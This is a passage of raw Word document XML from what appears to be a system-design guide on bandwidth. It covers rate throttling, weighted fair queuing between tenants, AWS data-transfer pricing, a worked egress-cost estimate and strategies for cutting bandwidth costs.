        <w:t>Sustained rate capped at 1 MB/s (bucket refills at this rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA1EA78" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Smooths out bursty traffic to protect downstream from overload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ACBE2E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application in system design:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6908DA94" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>API rate limiting by bandwidth:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> "Each customer gets 100 MB/s of API response bandwidth."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B640E0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Replication throttling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> "Database replication should use at most 200 Mbps (don't starve production traffic)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E3946F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1147"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backup throttling:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> "Backup jobs limited to 500 Mbps during business hours, unlimited at night."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C255F8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.4 Bandwidth Allocation Between Tenants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1468D74C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>In multi-tenant systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15184E09" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6076776C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total available bandwidth: 10 Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0675D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Tenant A (premium): Guaranteed 3 Gbps, burst to 5 Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451A41A9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Tenant B (premium): Guaranteed 3 Gbps, burst to 5 Gbps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B55D94C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Tenant C (free): Best-effort, up to 1 Gbps when available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477DF779" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Tenant D (free): Best-effort, up to 1 Gbps when available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468BC602" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weighted Fair Queuing (WFQ):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B380786" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Each tenant gets a queue with a configured weight.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85A6DA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>The scheduler serves queues proportional to their weights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355EC6BF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>When some tenants are idle, active tenants can burst above their guarantee (utilizing unused capacity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFB6727" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1148"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>When all tenants are active, each gets exactly their guaranteed share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB10DDF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="261BB314">
          <v:rect id="_x0000_i4379" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="356E0186" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Bandwidth Economics — Cost Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583D3F87" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.1 Cloud Bandwidth Pricing Models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BB13AE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AWS cost structure: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319"/>
        <w:gridCol w:w="6031"/>
      </w:tblGrid>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5A5ADE3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EEDACB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Transfer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4C7CC1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00487CAD">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="26F956B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0CBA1A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Inbound (from internet to AWS)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4C5F85" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="29A3329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7FBB49" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Outbound (first 100 GB/month)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40CA72" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="7D7F76E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D9512D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Outbound (next 10 TB/month)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0C28A1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.09/GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="4D6E882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02B5D9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Outbound (next 40 TB/month)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070598" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.085/GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="25BE99B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6A74F9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Outbound (&gt; 150 TB/month)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163366" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.05/GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="02FCC94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1BA3CD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Same-AZ (private IP)</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67AA4A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="2BF2A54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C26DF4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Cross-AZ (same region)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00F638" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.01/GB each direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="39BDE90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BA591A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Cross-region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F8ED8D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>$0.02/GB</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487CAD" w:rsidRPr="00487CAD" w14:paraId="5AA44B8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A285B8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>To CloudFront (CDN)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F0B033" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
            <w:r w:rsidRPr="00487CAD">
              <w:t>Free (data transfer to CDN is free, CDN outbound costs apply)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6BF239F4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implications for architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A64385" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Keep traffic within the same AZ when possible.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> Co-locate services that communicate heavily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73792526" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use private IPs</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (not public) for intra-VPC communication (free vs. $0.01/GB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099308DC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Route through CDN</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> for internet-facing traffic (often cheaper than direct EC2 egress).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C7A2AE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1149"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compress cross-region replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (every byte saved = money saved).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB8E758" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.2 Bandwidth Cost at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498FF7A8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example — A social media platform:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CB5F5" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7D4E3E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Daily active users: 10 million</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352FA359" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average session: 15 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A6CDD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Average data per session: 50 MB (images, videos, feed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624F4AD3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="16F67A44" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Daily outbound: 10,000,000 × 50 MB = 500 TB/day = 15 PB/month</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BD2E9D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD"/>
    <w:p w14:paraId="5CB20171" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>At $0.05/GB (volume discount):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EE4609" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>15,000,000 GB × $0.05 = $750,000/month in bandwidth alone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57019605" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why companies like Netflix, Google, Facebook build their own CDN infrastructure and peer directly with ISPs.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The cost of building and operating edge infrastructure is less than paying cloud egress fees at their scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E513FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.3 Bandwidth Cost Optimization Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593C800A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. CDN for static content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0108E337" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Move images, videos, CSS, JS to CDN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0177D1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>CDN egress is cheaper than origin egress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5E67AA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1150"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>High cache hit ratio = low origin bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBBC8C9" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Image/video optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B12B3AB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Serve appropriately sized images (don't send 4K images to mobile devices displaying at 300px).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07836923" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>WebP/AVIF instead of JPEG/PNG (30–50% smaller at same quality).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5765182A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1151"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Adaptive video bitrate (don't send 4K to users with 5 Mbps connections).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CE2CA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. API response optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72754FEC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>GraphQL / sparse fieldsets: return only requested fields (not the entire object).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19880A32" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Pagination: return 20 items, not 10,000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FBE494" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1152"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>ETag/conditional requests: return 304 (0 bytes) instead of 200 (full body) when data hasn't changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647CAF05" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Client-side caching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5347EF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Long Cache-Control: max-age headers for static resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB4BA0" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Service workers for offline/cache-first patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729134FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1153"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Reduces repeat requests entirely (zero bandwidth for cached responses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA64C3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Protocol efficiency:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8761D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
